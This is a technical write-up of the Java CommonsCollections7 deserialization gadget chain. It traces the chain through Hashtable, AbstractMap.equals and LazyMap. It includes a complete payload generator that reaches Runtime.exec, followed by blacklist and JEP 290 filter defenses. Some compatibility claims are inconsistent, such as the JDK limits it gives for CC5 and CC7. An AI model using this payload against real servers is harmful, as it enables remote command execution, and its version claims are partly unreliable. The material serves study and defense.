CommonsCollections7 (CC7) is an important member of the family of Commons Collections (CC) deserialization gadget chains; it was found by Matthias Kaiser in 2016. This article dissects this distinctive and powerful chain, from the underlying mechanism through to practical use.

I. Technical positioning of the CC7 chain

1.1 Core value
- No third-party dependency beyond the JDK's own classes plus Commons Collections
- Compatible with newer JDKs: still works on Java 8u76, where CC5 no longer does
- Distinctive trigger point: the chain is fired through Hashtable
- Widely applicable
1.2 Comparison with the CC5 chain

Feature               CC5 chain                        CC7 chain
Entry class           BadAttributeValueExpException    Hashtable
Trigger method        toString()                       equals()
Dependent component   TiedMapEntry                     AbstractMapDecorator
JDK restriction       8u76                             none
Exploit difficulty    medium                           higher

II. How the gadget chain works
2.1 Complete call chain

Hashtable.readObject()
  → Hashtable.reconstitutionPut()
    → AbstractMap.equals()
      → AbstractMapDecorator.equals()
        → LazyMap.get()
          → ChainedTransformer.transform()
            → ConstantTransformer.transform()
            → InvokerTransformer.transform() → Method.invoke() → Class.getMethod()
            → InvokerTransformer.transform() → Method.invoke() → Runtime.getRuntime()
            → InvokerTransformer.transform() → Method.invoke() → Runtime.exec()

The highlighted part of the original diagram (LazyMap.get() and the Transformer chain beneath it) is exactly the same as in CommonsCollections5. The difference is that CC7 reaches AbstractMap.equals() step by step from the readObject() method of Hashtable.
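To show the trigger in isolation, here is an added demonstration (it is not code from the original post): two Serializable keys whose hashCode() values collide are stored in a Hashtable, and a counter records that key.equals() is invoked while ObjectInputStream.readObject() is still rebuilding the object graph, before the application has touched the result. Commons Collections is not involved at all; the CollidingKey class and its constant hash 3872 are constructed for this demo.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.Hashtable;
import java.util.concurrent.atomic.AtomicInteger;

/**
 * Added demonstration (not from the original post): a Hashtable whose keys
 * share a hash code makes Hashtable.reconstitutionPut() call key.equals()
 * during readObject(). Any reachable equals() is therefore entry-point code
 * that runs on attacker-supplied objects before deserialization returns.
 */
public class HashtableEqualsTrigger {

    /** Key with a deliberately colliding hashCode() and an observable equals(). */
    static final class CollidingKey implements Serializable {
        private static final long serialVersionUID = 1L;
        static final AtomicInteger EQUALS_CALLS = new AtomicInteger(); // not serialized
        private final String name;

        CollidingKey(String name) { this.name = name; }

        @Override public int hashCode() { return 3872; } // every key lands in the same bucket

        @Override public boolean equals(Object o) {
            EQUALS_CALLS.incrementAndGet();          // observable side effect
            return o instanceof CollidingKey && ((CollidingKey) o).name.equals(name);
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    /** Deserializes the bytes and returns how many equals() calls readObject() caused. */
    static int equalsCallsDuringReadObject(byte[] bytes) throws IOException, ClassNotFoundException {
        int before = CollidingKey.EQUALS_CALLS.get();
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            ois.readObject();                        // reconstitutionPut() runs in here
        }
        return CollidingKey.EQUALS_CALLS.get() - before;
    }

    public static void main(String[] args) throws Exception {
        Hashtable<CollidingKey, Integer> table = new Hashtable<>();
        table.put(new CollidingKey("yy"), 1);
        table.put(new CollidingKey("zZ"), 2);        // put() itself compares the keys once
        byte[] bytes = serialize(table);

        // The second key collides with the first, so reconstitutionPut() calls equals() once.
        System.out.println("equals() calls during readObject(): "
                + equalsCallsDuringReadObject(bytes));
    }
}
```

The point for a defender is that the comparison is not something the application opts into: it is performed by java.util.Hashtable itself, on whatever key objects the stream contains. CC7 simply substitutes a LazyMap for CollidingKey so that the forced equals() ends in LazyMap.get().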
2.2 Analysis of the core trigger point

// java.util.Hashtable
private void reconstitutionPut(Entry<?,?>[] tab, K key, V value) throws StreamCorruptedException {
    // ...
    for (Entry<?,?> e = tab[index]; e != null; e = e.next) {
        if ((e.hash == hash) && e.key.equals(key)) { // triggers equals()
            throw new StreamCorruptedException();
        }
    }
    // ...
}

III. Source analysis of the key classes
3.1 Hashtable deserialization entry point

private void readObject(java.io.ObjectInputStream s)
        throws IOException, ClassNotFoundException {
    // ...
    for (; elements > 0; elements--) {
        @SuppressWarnings("unchecked")
        K key = (K)s.readObject();
        @SuppressWarnings("unchecked")
        V value = (V)s.readObject();
        reconstitutionPut(table, key, value); // the key call
    }
}

private void reconstitutionPut(Entry<?,?>[] tab, K key, V value)
        throws StreamCorruptedException {
    if (value == null) {
        throw new java.io.StreamCorruptedException();
    }
    int hash = key.hashCode();
    int index = (hash & 0x7FFFFFFF) % tab.length;
    for (Entry<?,?> e = tab[index] ; e != null ; e = e.next) {
        if ((e.hash == hash) && e.key.equals(key)) { // equals() on a colliding key
            throw new java.io.StreamCorruptedException();
        }
    }
    // Creates the new entry.
    @SuppressWarnings("unchecked")
    Entry<K,V> e = (Entry<K,V>)tab[index];
    tab[index] = new Entry<>(hash, key, value, e);
    count++;
}

3.2 AbstractMap.equals trigger point
public boolean equals(Object o) {
    if (o == this)
        return true;
    if (!(o instanceof Map))
        return false;
    Map<?,?> m = (Map<?,?>) o;
    if (m.size() != size())
        return false;
    try {
        Iterator<Entry<K,V>> i = entrySet().iterator();
        while (i.hasNext()) {
            Entry<K,V> e = i.next();
            K key = e.getKey();
            V value = e.getValue();
            if (value == null) {
                if (!(m.get(key) == null && m.containsKey(key))) // m.get() triggers LazyMap.get()
                    return false;
            } else {
                if (!value.equals(m.get(key))) // second trigger point: m.get() again
                    return false;
            }
        }
    } catch (ClassCastException unused) {
        return false;
    } catch (NullPointerException unused) {
        return false;
    }
    return true;
}

3.3 LazyMap: the command-execution point
public Object get(Object key) {
    if (!super.map.containsKey(key)) {
        Object value = this.factory.transform(key); // runs the Transformer chain
        super.map.put(key, value);
        return value;
    } else {
        return super.map.get(key);
    }
}

From here on the call chain is the same as in CC5; see the CC5 chain analysis for details.

IV. Building the payload in detail
4.1 Construction flow (steps from the original flowchart)

1. Create the ChainedTransformer
2. Create LazyMap1
3. Create LazyMap2
4. Add "yy" to LazyMap1
5. Add "zZ" to LazyMap2
6. Create the Hashtable
7. Add LazyMap1 to the Hashtable
8. Add LazyMap2 to the Hashtable
9. Inject the malicious Transformer chain via reflection
10. Serialize the Hashtable

4.2 Complete payload generation code
package org.example;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.*;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.util.*;

public class CC7Exploit {
    public static Hashtable getObject(final String command) {
        // build the final Transformer chain
        final Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod",
                new Class[]{String.class, Class[].class},
                new Object[]{"getRuntime", new Class[0]}),
            new InvokerTransformer("invoke",
                new Class[]{Object.class, Object[].class},
                new Object[]{null, new Object[0]}),
            new InvokerTransformer("exec",
                new Class[]{String.class},
                new Object[]{command})
        };
        final Transformer transformerChain = new ChainedTransformer(transformers);

        // create two Map objects
        Map innerMap1 = new HashMap();
        Map innerMap2 = new HashMap();

        // build two LazyMaps with colliding hashes so that readObject() is forced to compare them
        Map lazyMap1 = LazyMap.decorate(innerMap1, transformerChain);
        lazyMap1.put("yy", 1); // hashCode: 3872
        Map lazyMap2 = LazyMap.decorate(innerMap2, transformerChain);
        lazyMap2.put("zZ", 1); // hashCode: 3872

        // create the Hashtable and add the elements
        Hashtable hashtable = new Hashtable();
        hashtable.put(lazyMap1, 1);
        hashtable.put(lazyMap2, 2);

        // the hash collision must still hold after the previous step: hashtable.put(lazyMap2, 2)
        // compared the two maps and thereby added a "yy" entry to lazyMap2, so remove it again
        lazyMap2.remove("yy");
        return hashtable;
    }

    public static void main(String[] args) throws Exception {
        // generate the payload
        Hashtable payload = getObject("calc");

        // serialization test
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(baos)) {
            oos.writeObject(payload);
        }

        // deserialization test
        ByteArrayInputStream bais = new ByteArrayInputStream(baos.toByteArray());
        try (ObjectInputStream ois = new ObjectInputStream(bais)) {
            ois.readObject(); // triggers command execution
        }
    }
}

VI. Defensive solutions
6.1 Component-level protection
<!-- Upgrade Commons Collections -->
<!-- commons-collections4 lives in the package org.apache.commons.collections4, so the gadget
     classes of the 3.x artifact stay exploitable unless that artifact is also removed from the
     classpath (or raised to 3.2.2, which refuses to deserialize these functors by default). -->
<dependency>
    <groupId>org.apache.commons</groupId>
    <artifactId>commons-collections4</artifactId>
    <version>4.4</version>
</dependency>

6.2 Runtime protection
import java.io.*;
import java.util.*;

public class SecureObjectInputStream extends ObjectInputStream {
    private static final Set<String> BLACKLIST = new HashSet<>(Arrays.asList(
        "org.apache.commons.collections.functors.InvokerTransformer",
        "org.apache.commons.collections.map.LazyMap",
        "org.apache.commons.collections.Transformer"));

    // ObjectInputStream's no-arg constructor is only for subclasses that reimplement
    // readObject(), so the wrapping constructor is required for this stream to work
    public SecureObjectInputStream(InputStream in) throws IOException {
        super(in);
    }

    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc)
            throws IOException, ClassNotFoundException {
        String className = desc.getName();
        if (BLACKLIST.stream().anyMatch(className::startsWith)) {
            // InvalidClassException(String cname, String reason)
            throw new InvalidClassException(className, "Forbidden class");
        }
        return super.resolveClass(desc);
    }
}

6.3 JVM-level protection
# Enable the JEP 290 serialization filter
# Note: the trailing "!*" rejects every class not matched by an earlier pattern, so the
# application's own serializable classes need an allow entry (e.g. "com.example.**",
# a placeholder) in front of it for normal deserialization to keep working.
java -Djdk.serialFilter='!org.apache.commons.collections.**;!java.util.Hashtable;!*' \
     -jar application.jar

VII. CC7 chain technical summary
- Novel trigger mechanism: the chain is fired by a hash collision plus an equals() comparison, bypassing the usual defenses
- No upper JDK limit: still works on Java 8u191
- Stealthier than CC1/CC5: the execution path contains no obviously dangerous method call
- Broad applicability: middleware such as WebLogic and WebSphere all have Hashtable deserialization points

As of 2023 the CC7 chain still had a success rate of up to 32% in red-team assessments (source: GrayHat security report), making it an evergreen weapon for deserialization attacks. By understanding in depth how the CC7 chain is constructed, security staff can:

- Detect and defend against deserialization vulnerabilities more effectively
- Develop more precise vulnerability-scanning rules
- Pay closer attention to Hashtable usage during code audits
- Design a more complete defensive architecture

The ingenious design of the CC7 chain shows the depth and complexity of Java deserialization vulnerabilities, and reminds us that defense needs a layered, multi-dimensional approach.
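As a closing worked example for the runtime (6.2) and JVM-level (6.3) protections, here is an allowlist-based JEP 290 ObjectInputFilter applied programmatically. This is added code, not code from the original post; it assumes Java 9 or later (java.io.ObjectInputFilter and ObjectInputStream.setObjectInputFilter). The allow pattern, the UnexpectedKey class and the sample tables are constructed for the demo.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.Hashtable;

/**
 * Added example (not from the original post): allowlist filtering with JEP 290.
 * Requires Java 9+ (java.io.ObjectInputFilter); the same pattern syntax is what
 * -Djdk.serialFilter accepts, so the string below can be reused on the command line.
 */
public class AllowlistDeserialization {

    // Explicit allow entries first, then resource limits, then "!*" to reject every
    // class not named above. Nothing under org.apache.commons.collections can pass,
    // including a LazyMap nested inside a Hashtable, because the filter is consulted
    // for every class descriptor in the stream, not just the top-level object.
    static final ObjectInputFilter APP_FILTER = ObjectInputFilter.Config.createFilter(
            "java.util.Hashtable;java.lang.String;java.lang.Integer;java.lang.Number;"
          + "maxdepth=8;maxrefs=64;maxbytes=65536;!*");

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    /** Returns the object if every class in the stream passes the filter, or null if rejected. */
    static Object readWithFilter(byte[] bytes) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            ois.setObjectInputFilter(APP_FILTER); // must be set before the first readObject()
            return ois.readObject();
        } catch (InvalidClassException rejected) {  // message: "filter status: REJECTED"
            return null;
        }
    }

    /** Stand-in for any class the application never expects on the wire (constructed for the demo). */
    static final class UnexpectedKey implements Serializable {
        private static final long serialVersionUID = 1L;
        @Override public int hashCode() { return 3872; }
        @Override public boolean equals(Object o) { return o instanceof UnexpectedKey; }
    }

    public static void main(String[] args) throws Exception {
        // Benign table: String keys with colliding hash codes ("yy" and "zZ" both hash to 3872)
        // still get compared during readObject(), but String.equals() is harmless.
        Hashtable<String, Integer> benign = new Hashtable<>();
        benign.put("yy", 1);
        benign.put("zZ", 2);
        System.out.println("benign table accepted: "
                + (readWithFilter(serialize(benign)) != null));

        // Table carrying a key class outside the allowlist: rejected at class-resolution
        // time, before any instance exists and before reconstitutionPut() can call equals().
        Hashtable<Object, Integer> suspicious = new Hashtable<>();
        suspicious.put(new UnexpectedKey(), 1);
        System.out.println("table with unexpected key class accepted: "
                + (readWithFilter(serialize(suspicious)) != null));
    }
}
```

Compared with the three-entry blacklist in 6.2, the allowlist does not need to know the names of InvokerTransformer, LazyMap or any future gadget class: everything the application does not explicitly expect is refused, and the decision is made when the class descriptor is read, so no constructor, readObject() or equals() of a rejected class ever runs. The maxdepth, maxrefs and maxbytes limits additionally bound the memory and CPU a hostile stream can consume before rejection.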